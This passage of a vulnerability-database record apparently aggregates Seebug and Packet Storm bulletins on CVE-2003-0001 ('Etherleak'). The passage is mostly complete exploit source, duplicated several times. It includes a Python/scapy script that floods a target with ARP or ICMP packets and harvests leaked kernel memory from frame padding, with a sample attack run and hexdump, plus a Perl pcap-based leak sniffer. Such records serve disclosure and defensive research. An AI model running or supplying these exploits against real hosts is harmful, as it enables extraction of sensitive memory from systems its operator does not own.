sys.argv[2]\r\n\tif type == 'arp':\r\n\t\tpass\r\n\telif type == 'icmp':\r\n\t\tpass\r\n\telse:\r\n\t\tprint "Bad type!"\r\n\t\tsys.exit(0)\r\n\tpid = os.fork()\r\n\tif(pid):\r\n\t\tprint "[ Attacking %s for %s padding saved to %s.hex" % (sys.argv[1],sys.argv[2],sys.argv[3])\r\n\t\tspawn(sys.argv[1],sys.argv[2])\r\n\twhile True:\r\n\t\tif type == 'arp':\r\n\t\t\tmyfilter = "host %s and arp" % sys.argv[1]\r\n\t\telif type == 'icmp':\r\n\t\t\tmyfilter = "host %s and icmp" % sys.argv[1]\r\n\t\tx = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding))\r\n\t\tp = x[0]\r\n\t\tif type == 'arp':\r\n\t\t\tpad = p.getlayer(2)\r\n\t\tif type == 'icmp':\r\n\t\t\tpad = p.getlayer(4)\r\n\t\tleak = str(pad)\r\n\t\thexfull = binascii.b2a_hex(leak)\r\n\t\tfile = "%s.hex"%sys.argv[3]\r\n\t\tfdesc = open(file,"a")\r\n\t\tfdesc.write(hexfull + "\\n")\r\n\t\tfdesc.close()\r\n\t\t# 32 bits leaked here for me.\r\n\t\tif type == 'icmp':\r\n\t\t\tbytes = leak[9:13]\r\n\t\telif type == 'arp':\r\n\t\t\tbytes = leak[10:14]\r\n\t\tfdesc = open(sys.argv[3],"ab")\r\n\t\tfdesc.write(bytes)\r\n\t\tfdesc.close()\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-79723", "status": "cve,poc"}, {"lastseen": "2017-11-19T22:07:10", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2007-03-24T00:00:00", "type": "seebug", "title": "Ethernet Device Drivers Frame Padding Info Leakage Exploit (Etherleak)", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2007-03-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-6453", "id": "SSV:6453", "sourceData": "\n #!/usr/bin/perl -w\r\n# etherleak, code that has been 5 years coming.\r\n#\r\n# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,\r\n# a vulnerability that would be come known as the 'etherleak' bug.  In\r\n# various situations an ethernet frame must be padded to reach a specific\r\n# size or fall on a certain boundary.  This task is left up to the driver\r\n# for the ethernet device.  The RFCs state that this padding must consist\r\n# of NULLs.  The bug is that at the time and still to this day, many device\r\n# drivers do not pad will NULLs, but rather pad with unsanitized portions\r\n# of kernel memory, oftentimes exposing sensitive information to remote\r\n# systems or those savvy enough to coerce their targets to do so.\r\n#\r\n# Proof of this can be found by googling for 'warchild and etherleak', or\r\n# by visiting:\r\n#\r\n#  http://lkml.org/lkml/2002/4/27/101\r\n#\r\n# This was ultimately fixed in the Linux kernel, but over time this\r\n# vulnerability reared its head numerous times, but at the core the\r\n# vulnerability was the same as the one I originally published.  The most\r\n# public of these was CVE-2003-0001, which was assigned to address an\r\n# official @stake advisory.\r\n#\r\n# This code can be found its most current form at:\r\n#  \r\n#  http://spoofed.org/files/exploits/etherleak\r\n#\r\n# Jon Hart <jhart@spoofed.org>, March 2007\r\n#\r\n\r\nuse strict;\r\nuse diagnostics;\r\nuse warnings;\r\nuse Getopt::Long;\r\nuse Net::Pcap;\r\nuse NetPacket::Ethernet qw(:ALL);\r\nuse NetPacket::IP qw(:ALL);\r\n\r\nmy %opts = ();\r\nmy ($iface, $err, $pcap_t, $pcap_save, $filter_string); \r\n\r\nGetOptions( \\%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or\r\n            die "Unknown option: $!\\n" && &usage();\r\n\r\nif (defined($opts{'help'})) {\r\n   &usage();\r\n   exit(0);\r\n}\r\n\r\nif (defined($opts{'read'})) {\r\n   $pcap_t = Net::Pcap::open_offline($opts{'read'}, \\$err);\r\n   if (!defined($pcap_t)) {\r\n      print("Net::Pcap::open_offline failed: $err\\n");\r\n      exit 1;\r\n   }\r\n} else {\r\n   if (defined($opts{'interface'})) {\r\n      $iface = $opts{'interface'};\r\n   } else {\r\n      $iface = Net::Pcap::lookupdev(\\$err);\r\n      if (defined($err)) {\r\n         print(STDERR "lookupdev() failed: $err\\n");\r\n         exit(1);\r\n      } else {\r\n         print(STDERR "No interface specified.  Using $iface\\n");\r\n      }\r\n   }\r\n\r\n   $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \\$err);\r\n   if (!defined($pcap_t)) {\r\n      print("Net::Pcap::open_live failed on $iface: $err\\n");\r\n      exit 1;\r\n   }\r\n}\r\n\r\nmy $filter;\r\nif (Net::Pcap::compile($pcap_t, \\$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) {\r\n   printf("Net::Pcap::compile failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n   exit(1);\r\n}\r\n\r\nif (Net::Pcap::setfilter($pcap_t, $filter) == -1) {\r\n   printf("Net::Pcap::setfilter failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n   exit(1);\r\n}\r\n\r\nif (defined($opts{'write'})) {\r\n   $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});\r\n   if (!defined($pcap_save)) {\r\n      printf("Net::Pcap::dump_open failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n      exit(1);\r\n   }\r\n}\r\n\r\nNet::Pcap::loop($pcap_t, -1, \\&process, "foo");\r\nNet::Pcap::close($pcap_t);\r\n\r\nif (defined($opts{'write'})) {\r\n   Net::Pcap::dump_close($pcap_save);\r\n}\r\n\r\n\r\n\r\nsub process {\r\n   my ($user, $hdr, $pkt) = @_;\r\n   my ($link, $ip);\r\n   my $jump = 0;\r\n\r\n   my $datalink = Net::Pcap::datalink($pcap_t);\r\n   if    ($datalink == 1) { $jump += 14; }\r\n   elsif ($datalink == 113) { $jump += 16; }\r\n   else { printf("Skipping datalink $datalink\\n"); return; }\r\n\r\n   my $l2 = NetPacket::Ethernet->decode($pkt);\r\n   \r\n   if ($l2->{type} == ETH_TYPE_IP) {\r\n      $ip = NetPacket::IP->decode(eth_strip($pkt));\r\n      $jump += $ip->{len};\r\n   } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }\r\n   else { \r\n      # assume 802.3 ethernet, and just jump ahead the length\r\n      for ($l2->{dest_mac}) {\r\n         if (/^0180c200/) {\r\n            # spanning tree\r\n            # l2->{type} here will actually be the length.  HACK.\r\n            $jump += $l2->{type};\r\n         }\r\n         elsif (/^01000ccccc/) {\r\n            # CDP/VTP/DTP/PAgP/UDLD/PVST, etc\r\n            # l2->{type} here will actually be the length.  HACK.\r\n            $jump += $l2->{type};\r\n         } elsif (/^ab0000020000/) {\r\n            # DEC-MOP-Remote-Console\r\n            return;\r\n         } else {\r\n            # loopback\r\n            if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }\r\n            printf("Skipping datalink $datalink l2 type %s\\n", $l2->{type}); return;\r\n         }\r\n      }\r\n   }\r\n\r\n\r\n   if ($hdr->{len} > $jump) {\r\n      my $trailer_bin = substr($pkt, $jump);\r\n      my $trailer_hex = "";\r\n      my $trailer_ascii = "";\r\n      foreach (split(//, $trailer_bin)) {\r\n         $trailer_hex .= sprintf("%02x", ord($_));\r\n         if (ord($_) >= 32 && ord($_) <= 126) {\r\n            $trailer_ascii .= $_;\r\n         } else { $trailer_ascii .= "."; }\r\n      }\r\n      # ignore all trailers that are just single characters repeated.\r\n      # most OS' use 0, F, 5 or a.\r\n      unless ($trailer_hex =~ /^(0|5|f|a)\\1*$/i) {\r\n         unless ($opts{'quiet'}) {\r\n            print("#"x80, "\\n");\r\n            printf("%s -> %s\\n", $l2->{src_mac}, $l2->{dest_mac});\r\n            if ($l2->{type} == ETH_TYPE_IP) {\r\n               printf("%s -> %s\\n", $ip->{src_ip}, $ip->{dest_ip});\r\n            }\r\n         }\r\n         print("$trailer_hex\\t$trailer_ascii\\n");\r\n         if (defined($opts{'write'})) {\r\n            Net::Pcap::dump($pcap_save, $hdr, $pkt);\r\n         }\r\n      }\r\n   }\r\n}\r\n\r\nsub usage {\r\n   print <<EOF;\r\n$0 -- A demonstration of the infamous 'etherleak' bug.\r\n\r\n   CVE-2003-0001, and countless repeats of the same vulnerability.\r\n\r\n   Options:\r\n   [-h|--help]                  # this message\r\n   [-i|--interface] <interface> # interface to listen on\r\n   [-f|--filter] <pcap filter>  # apply this filter to the traffic\r\n   [-r|--read] <path to pcap>   # read from this saved pcap file\r\n   [-w|--write] <path to pcap>  # write tothis saved pcap file\r\n   [-q|--quiet]                 # be quiet\r\n   [-v|--verbose]               # be verbose\r\n\r\nEOF\r\n\r\n\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-6453", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "status": "poc"}, {"lastseen": "2017-11-19T14:21:46", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Ethernet Device Drivers Frame Padding - Info Leakage Exploit (Etherleak)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-64575", "id": "SSV:64575", "sourceData": "\n #!/usr/bin/perl -w\r\n# etherleak, code that has been 5 years coming.\r\n#\r\n# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,\r\n# a vulnerability that would be come known as the 'etherleak' bug. In\r\n# various situations an ethernet frame must be padded to reach a specific\r\n# size or fall on a certain boundary. This task is left up to the driver\r\n# for the ethernet device. The RFCs state that this padding must consist\r\n# of NULLs. The bug is that at the time and still to this day, many device\r\n# drivers do not pad will NULLs, but rather pad with unsanitized portions\r\n# of kernel memory, oftentimes exposing sensitive information to remote\r\n# systems or those savvy enough to coerce their targets to do so.\r\n#\r\n# Proof of this can be found by googling for 'warchild and etherleak', or\r\n# by visiting:\r\n#\r\n# http://lkml.org/lkml/2002/4/27/101\r\n#\r\n# This was ultimately fixed in the Linux kernel, but over time this\r\n# vulnerability reared its head numerous times, but at the core the\r\n# vulnerability was the same as the one I originally published. The most\r\n# public of these was CVE-2003-0001, which was assigned to address an\r\n# official @stake advisory.\r\n#\r\n# This code can be found its most current form at:\r\n# \r\n# http://spoofed.org/files/exploits/etherleak\r\n#\r\n# Jon Hart <jhart@spoofed.org>, March 2007\r\n#\r\n\r\nuse strict;\r\nuse diagnostics;\r\nuse warnings;\r\nuse Getopt::Long;\r\nuse Net::Pcap;\r\nuse NetPacket::Ethernet qw(:ALL);\r\nuse NetPacket::IP qw(:ALL);\r\n\r\nmy %opts = ();\r\nmy ($iface, $err, $pcap_t, $pcap_save, $filter_string); \r\n\r\nGetOptions( \\%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or\r\n die "Unknown option: $!\\n" && &usage();\r\n\r\nif (defined($opts{'help'})) {\r\n &usage();\r\n exit(0);\r\n}\r\n\r\nif (defined($opts{'read'})) {\r\n $pcap_t = Net::Pcap::open_offline($opts{'read'}, \\$err);\r\n if (!defined($pcap_t)) {\r\n print("Net::Pcap::open_offline failed: $err\\n");\r\n exit 1;\r\n }\r\n} else {\r\n if (defined($opts{'interface'})) {\r\n $iface = $opts{'interface'};\r\n } else {\r\n $iface = Net::Pcap::lookupdev(\\$err);\r\n if (defined($err)) {\r\n print(STDERR "lookupdev() failed: $err\\n");\r\n exit(1);\r\n } else {\r\n print(STDERR "No interface specified. Using $iface\\n");\r\n }\r\n }\r\n\r\n $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \\$err);\r\n if (!defined($pcap_t)) {\r\n print("Net::Pcap::open_live failed on $iface: $err\\n");\r\n exit 1;\r\n }\r\n}\r\n\r\nmy $filter;\r\nif (Net::Pcap::compile($pcap_t, \\$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) {\r\n printf("Net::Pcap::compile failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (Net::Pcap::setfilter($pcap_t, $filter) == -1) {\r\n printf("Net::Pcap::setfilter failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (defined($opts{'write'})) {\r\n $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});\r\n if (!defined($pcap_save)) {\r\n printf("Net::Pcap::dump_open failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n }\r\n}\r\n\r\nNet::Pcap::loop($pcap_t, -1, \\&process, "foo");\r\nNet::Pcap::close($pcap_t);\r\n\r\nif (defined($opts{'write'})) {\r\n Net::Pcap::dump_close($pcap_save);\r\n}\r\n\r\n\r\n\r\nsub process {\r\n my ($user, $hdr, $pkt) = @_;\r\n my ($link, $ip);\r\n my $jump = 0;\r\n\r\n my $datalink = Net::Pcap::datalink($pcap_t);\r\n if ($datalink == 1) { $jump += 14; }\r\n elsif ($datalink == 113) { $jump += 16; }\r\n else { printf("Skipping datalink $datalink\\n"); return; }\r\n\r\n my $l2 = NetPacket::Ethernet->decode($pkt);\r\n \r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n $ip = NetPacket::IP->decode(eth_strip($pkt));\r\n $jump += $ip->{len};\r\n } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }\r\n else { \r\n # assume 802.3 ethernet, and just jump ahead the length\r\n for ($l2->{dest_mac}) {\r\n if (/^0180c200/) {\r\n # spanning tree\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n }\r\n elsif (/^01000ccccc/) {\r\n # CDP/VTP/DTP/PAgP/UDLD/PVST, etc\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n } elsif (/^ab0000020000/) {\r\n # DEC-MOP-Remote-Console\r\n return;\r\n } else {\r\n # loopback\r\n if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }\r\n printf("Skipping datalink $datalink l2 type %s\\n", $l2->{type}); return;\r\n }\r\n }\r\n }\r\n\r\n\r\n if ($hdr->{len} > $jump) {\r\n my $trailer_bin = substr($pkt, $jump);\r\n my $trailer_hex = "";\r\n my $trailer_ascii = "";\r\n foreach (split(//, $trailer_bin)) {\r\n $trailer_hex .= sprintf("%02x", ord($_));\r\n if (ord($_) >= 32 && ord($_) <= 126) {\r\n $trailer_ascii .= $_;\r\n } else { $trailer_ascii .= "."; }\r\n }\r\n # ignore all trailers that are just single characters repeated.\r\n # most OS' use 0, F, 5 or a.\r\n unless ($trailer_hex =~ /^(0|5|f|a)\\1*$/i) {\r\n unless ($opts{'quiet'}) {\r\n print("#"x80, "\\n");\r\n printf("%s -> %s\\n", $l2->{src_mac}, $l2->{dest_mac});\r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n printf("%s -> %s\\n", $ip->{src_ip}, $ip->{dest_ip});\r\n }\r\n }\r\n print("$trailer_hex\\t$trailer_ascii\\n");\r\n if (defined($opts{'write'})) {\r\n Net::Pcap::dump($pcap_save, $hdr, $pkt);\r\n }\r\n }\r\n }\r\n}\r\n\r\nsub usage {\r\n print <<EOF;\r\n$0 -- A demonstration of the infamous 'etherleak' bug.\r\n\r\n CVE-2003-0001, and countless repeats of the same vulnerability.\r\n\r\n Options:\r\n [-h|--help] # this message\r\n [-i|--interface] <interface> # interface to listen on\r\n [-f|--filter] <pcap filter> # apply this filter to the traffic\r\n [-r|--read] <path to pcap> # read from this saved pcap file\r\n [-w|--write] <path to pcap> # write tothis saved pcap file\r\n [-q|--quiet] # be quiet\r\n [-v|--verbose] # be verbose\r\n\r\nEOF\r\n\r\n\r\n}\r\n\r\n# milw0rm.com [2007-03-23]\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-64575", "status": "cve,poc"}, {"lastseen": "2017-11-19T16:09:02", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Linux Kernel 2.0.x/2.2.x/2.4.x,FreeBSD 4.x Network Device Driver Frame Padding Information Disclosure", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-75942", "id": "SSV:75942", "sourceData": "\n source: http://www.securityfocus.com/bid/6535/info\r\n\r\nNetwork device drivers for several vendors have been reported to disclose potentially sensitive information to attackers.\r\n\r\nFrames that are smaller than the minimum frame size should have the unused portion of the frame buffer padded with null (or other) bytes. Some device drivers fail to do this adequately, leaving the data that was stored in the memory comprising the buffer prior to its use intact. Consequently, this data may be transmitted within frames across Ethernet segments. Since the Ethernet frame buffer is allocated in kernel memory space, sensitive data may be leaked.\r\n\r\nCisco has stated that the IOS 12.1 and 12.2 trains are not affected.\r\n\r\nNational Semiconductor Ethernet controller chips are not vulnerable to this issue. \r\n\r\n#!/usr/bin/perl -w\r\n# etherleak, code that has been 5 years coming.\r\n#\r\n# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,\r\n# a vulnerability that would be come known as the 'etherleak' bug. In\r\n# various situations an ethernet frame must be padded to reach a specific\r\n# size or fall on a certain boundary. This task is left up to the driver\r\n# for the ethernet device. The RFCs state that this padding must consist\r\n# of NULLs. The bug is that at the time and still to this day, many device\r\n# drivers do not pad will NULLs, but rather pad with unsanitized portions\r\n# of kernel memory, oftentimes exposing sensitive information to remote\r\n# systems or those savvy enough to coerce their targets to do so.\r\n#\r\n# Proof of this can be found by googling for 'warchild and etherleak', or\r\n# by visiting:\r\n#\r\n# http://lkml.org/lkml/2002/4/27/101\r\n#\r\n# This was ultimately fixed in the Linux kernel, but over time this\r\n# vulnerability reared its head numerous times, but at the core the\r\n# vulnerability was the same as the one I originally published. The most\r\n# public of these was CVE-2003-0001, which was assigned to address an\r\n# official @stake advisory.\r\n#\r\n# This code can be found its most current form at:\r\n# \r\n# http://spoofed.org/files/exploits/etherleak\r\n#\r\n# Jon Hart <jhart@spoofed.org>, March 2007\r\n#\r\n\r\nuse strict;\r\nuse diagnostics;\r\nuse warnings;\r\nuse Getopt::Long;\r\nuse Net::Pcap;\r\nuse NetPacket::Ethernet qw(:ALL);\r\nuse NetPacket::IP qw(:ALL);\r\n\r\nmy %opts = ();\r\nmy ($iface, $err, $pcap_t, $pcap_save, $filter_string); \r\n\r\nGetOptions( \\%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or\r\n die "Unknown option: $!\\n" && &usage();\r\n\r\nif (defined($opts{'help'})) {\r\n &usage();\r\n exit(0);\r\n}\r\n\r\nif (defined($opts{'read'})) {\r\n $pcap_t = Net::Pcap::open_offline($opts{'read'}, \\$err);\r\n if (!defined($pcap_t)) {\r\n print("Net::Pcap::open_offline failed: $err\\n");\r\n exit 1;\r\n }\r\n} else {\r\n if (defined($opts{'interface'})) {\r\n $iface = $opts{'interface'};\r\n } else {\r\n $iface = Net::Pcap::lookupdev(\\$err);\r\n if (defined($err)) {\r\n print(STDERR "lookupdev() failed: $err\\n");\r\n exit(1);\r\n } else {\r\n print(STDERR "No interface specified. Using $iface\\n");\r\n }\r\n }\r\n\r\n $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \\$err);\r\n if (!defined($pcap_t)) {\r\n print("Net::Pcap::open_live failed on $iface: $err\\n");\r\n exit 1;\r\n }\r\n}\r\n\r\nmy $filter;\r\nif (Net::Pcap::compile($pcap_t, \\$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) {\r\n printf("Net::Pcap::compile failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (Net::Pcap::setfilter($pcap_t, $filter) == -1) {\r\n printf("Net::Pcap::setfilter failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (defined($opts{'write'})) {\r\n $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});\r\n if (!defined($pcap_save)) {\r\n printf("Net::Pcap::dump_open failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n }\r\n}\r\n\r\nNet::Pcap::loop($pcap_t, -1, \\&process, "foo");\r\nNet::Pcap::close($pcap_t);\r\n\r\nif (defined($opts{'write'})) {\r\n Net::Pcap::dump_close($pcap_save);\r\n}\r\n\r\n\r\n\r\nsub process {\r\n my ($user, $hdr, $pkt) = @_;\r\n my ($link, $ip);\r\n my $jump = 0;\r\n\r\n my $datalink = Net::Pcap::datalink($pcap_t);\r\n if ($datalink == 1) { $jump += 14; }\r\n elsif ($datalink == 113) { $jump += 16; }\r\n else { printf("Skipping datalink $datalink\\n"); return; }\r\n\r\n my $l2 = NetPacket::Ethernet->decode($pkt);\r\n \r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n $ip = NetPacket::IP->decode(eth_strip($pkt));\r\n $jump += $ip->{len};\r\n } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }\r\n else { \r\n # assume 802.3 ethernet, and just jump ahead the length\r\n for ($l2->{dest_mac}) {\r\n if (/^0180c200/) {\r\n # spanning tree\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n }\r\n elsif (/^01000ccccc/) {\r\n # CDP/VTP/DTP/PAgP/UDLD/PVST, etc\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n } elsif (/^ab0000020000/) {\r\n # DEC-MOP-Remote-Console\r\n return;\r\n } else {\r\n # loopback\r\n if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }\r\n printf("Skipping datalink $datalink l2 type %s\\n", $l2->{type}); return;\r\n }\r\n }\r\n }\r\n\r\n\r\n if ($hdr->{len} > $jump) {\r\n my $trailer_bin = substr($pkt, $jump);\r\n my $trailer_hex = "";\r\n my $trailer_ascii = "";\r\n foreach (split(//, $trailer_bin)) {\r\n $trailer_hex .= sprintf("%02x", ord($_));\r\n if (ord($_) >= 32 && ord($_) <= 126) {\r\n $trailer_ascii .= $_;\r\n } else { $trailer_ascii .= "."; }\r\n }\r\n # ignore all trailers that are just single characters repeated.\r\n # most OS' use 0, F, 5 or a.\r\n unless ($trailer_hex =~ /^(0|5|f|a)\\1*$/i) {\r\n unless ($opts{'quiet'}) {\r\n print("#"x80, "\\n");\r\n printf("%s -> %s\\n", $l2->{src_mac}, $l2->{dest_mac});\r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n printf("%s -> %s\\n", $ip->{src_ip}, $ip->{dest_ip});\r\n }\r\n }\r\n print("$trailer_hex\\t$trailer_ascii\\n");\r\n if (defined($opts{'write'})) {\r\n Net::Pcap::dump($pcap_save, $hdr, $pkt);\r\n }\r\n }\r\n }\r\n}\r\n\r\nsub usage {\r\n print <<EOF;\r\n$0 -- A demonstration of the infamous 'etherleak' bug.\r\n\r\n CVE-2003-0001, and countless repeats of the same vulnerability.\r\n\r\n Options:\r\n [-h|--help] # this message\r\n [-i|--interface] <interface> # interface to listen on\r\n [-f|--filter] <pcap filter> # apply this filter to the traffic\r\n [-r|--read] <path to pcap> # read from this saved pcap file\r\n [-w|--write] <path to pcap> # write tothis saved pcap file\r\n [-q|--quiet] # be quiet\r\n [-v|--verbose] # be verbose\r\n\r\nEOF\r\n\r\n\r\n}\r\n\r\n# milw0rm.com [2007-03-23]\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-75942", "status": "cve,poc"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:25", "references": [], "edition": 1, "description": "", "reporter": "prdelka", "published": "2013-06-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "packetstorm", "title": "Cisco ASA Ethernet Information Leak", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], "modified": "2013-06-10T00:00:00", "href": "https://packetstormsecurity.com/files/121969/Cisco-ASA-Ethernet-Information-Leak.html", "id": "PACKETSTORM:121969", "sourceData": "`#!/usr/bin/env python \n# CVE-2003-0001 'Etherleak' exploit \n# ================================= \n# Exploit for hosts which use a network device driver that pads \n# ethernet frames with data which vary from one packet to another, \n# likely taken from kernel memory, system memory allocated to \n# the device driver, or a hardware buffer on its network interface \n# card. Exploit uses scapy with either ICMP or ARP requests as \n# this can trigger with either but ICMP can hit layer3 filtering \n# rules. Using ARP the padding appears to leak only fixed constant \n# values when exploited, ICMP leaks random bytes. \n# \n# root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky \n# WARNING: No route found for IPv6 destination :: (no default route?) \n# [ CVE-2003-0001 'Etherleak' exploit \n# [ Attacking x.x.x.254 for icmp padding saved to leaky.hex \n# ............................................................^C!Killing \n# !Killing \n# root@bt:~/0d# hexdump -C leaky | head \n# 00000000 e6 bd a6 9b 90 eb 44 f5 18 a5 29 2a 16 5a 08 ff |......D...)*.Z..| \n# 00000010 43 e1 23 07 8f 96 5a 24 3f 3d 33 7d b4 97 7e 18 |C.#...Z$?=3}..~.| \n# 00000020 05 c9 7c 2c a5 c0 fa 7a 76 f3 51 c0 fe 07 72 32 |..|,...zv.Q...r2| \n# 00000030 9e ad 6a 67 ad 43 58 17 60 43 bc 2b b8 fb cc 70 |..jg.CX.`C.+...p| \n# 00000040 99 92 80 84 03 03 6f 8f 18 d3 5b 5e f0 1e 3a 83 |......o...[^..:.| \n# 00000050 3d 82 e7 cd 3e 1f 31 74 b0 06 8c a2 7e 14 6b fb |=...>.1t....~.k.| \n# 00000060 72 9b ac 64 74 9b a4 d9 23 5b 92 82 0d 0b 31 f0 |r..dt...#[....1.| \n# 00000070 a9 4f dd 3f bf 2b 5c 67 6c 22 fa da d0 2b d6 39 |.O.?.+\\gl\"...+.9| \n# 00000080 40 58 13 4f 3d bb 48 03 d3 53 3c 5c 44 d2 3d b2 |@X.O=.H..S<\\D.=.| \n# 00000090 4f f2 a9 4a 02 80 4e 1b 6c bd 69 89 bd 76 1b 0a |O..J..N.l.i..v..| \n# \n# This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference \n# is CSCua88376 and PSIRT-0669464365. \n# \n# -- prdelka \n# \nimport os \nimport sys \nimport signal \nimport binascii \nfrom scapy.all import * \n \ndef signalhandler(signal,id): \nprint \"!Killing\" \nsys.exit(0) \n \ndef spawn(host,type): \nif type == 'arp': \nsend(ARP(pdst=host),loop=1,nofilter=1) \nelif type == 'icmp': \nsend(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1) \n \nif __name__ == \"__main__\": \nprint \"[ CVE-2003-0001 'Etherleak' exploit\" \nsignal.signal(signal.SIGINT,signalhandler) \nif len(sys.argv) < 4: \nprint \"[ No! Use with <host> <arp|icmp> <file>\" \nsys.exit(1) \ntype = sys.argv[2] \nif type == 'arp': \npass \nelif type == 'icmp': \npass \nelse: \nprint \"Bad type!\" \nsys.exit(0) \npid = os.fork() \nif(pid): \nprint \"[ Attacking %s for %s padding saved to %s.hex\" % (sys.argv[1],sys.argv[2],sys.argv[3]) \nspawn(sys.argv[1],sys.argv[2]) \nwhile True: \nif type == 'arp': \nmyfilter = \"host %s and arp\" % sys.argv[1] \nelif type == 'icmp': \nmyfilter = \"host %s and icmp\" % sys.argv[1] \nx = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding)) \np = x[0] \nif type == 'arp': \npad = p.getlayer(2) \nif type == 'icmp': \npad = p.getlayer(4) \nleak = str(pad) \nhexfull = binascii.b2a_hex(leak) \nfile = \"%s.hex\"%sys.argv[3] \nfdesc = open(file,\"a\") \nfdesc.write(hexfull + \"\\n\") \nfdesc.close() \n# 32 bits leaked here for me. \nif type == 'icmp': \nbytes = leak[9:13] \nelif type == 'arp': \nbytes = leak[10:14] \nfdesc = open(sys.argv[3],\"ab\") \nfdesc.write(bytes) \nfdesc.close() \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/121969/ciscoasa-leak.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:17:02", "references": [], "description": "", "edition": 1, "reporter": "Jon Hart", "published": "2007-03-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "etherleak.txt", "type": "packetstorm", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], "modified": "2007-03-24T00:00:00", "href": "https://packetstormsecurity.com/files/55335/etherleak.txt.html", "id": "PACKETSTORM:55335", "sourceData": "`#!/usr/bin/perl -w \n# etherleak, code that has been 5 years coming. \n# \n# On 04/27/2002, I disclosed on the Linux Kernel Mailing list, \n# a vulnerability that would be come known as the 'etherleak' bug. In \n# various situations an 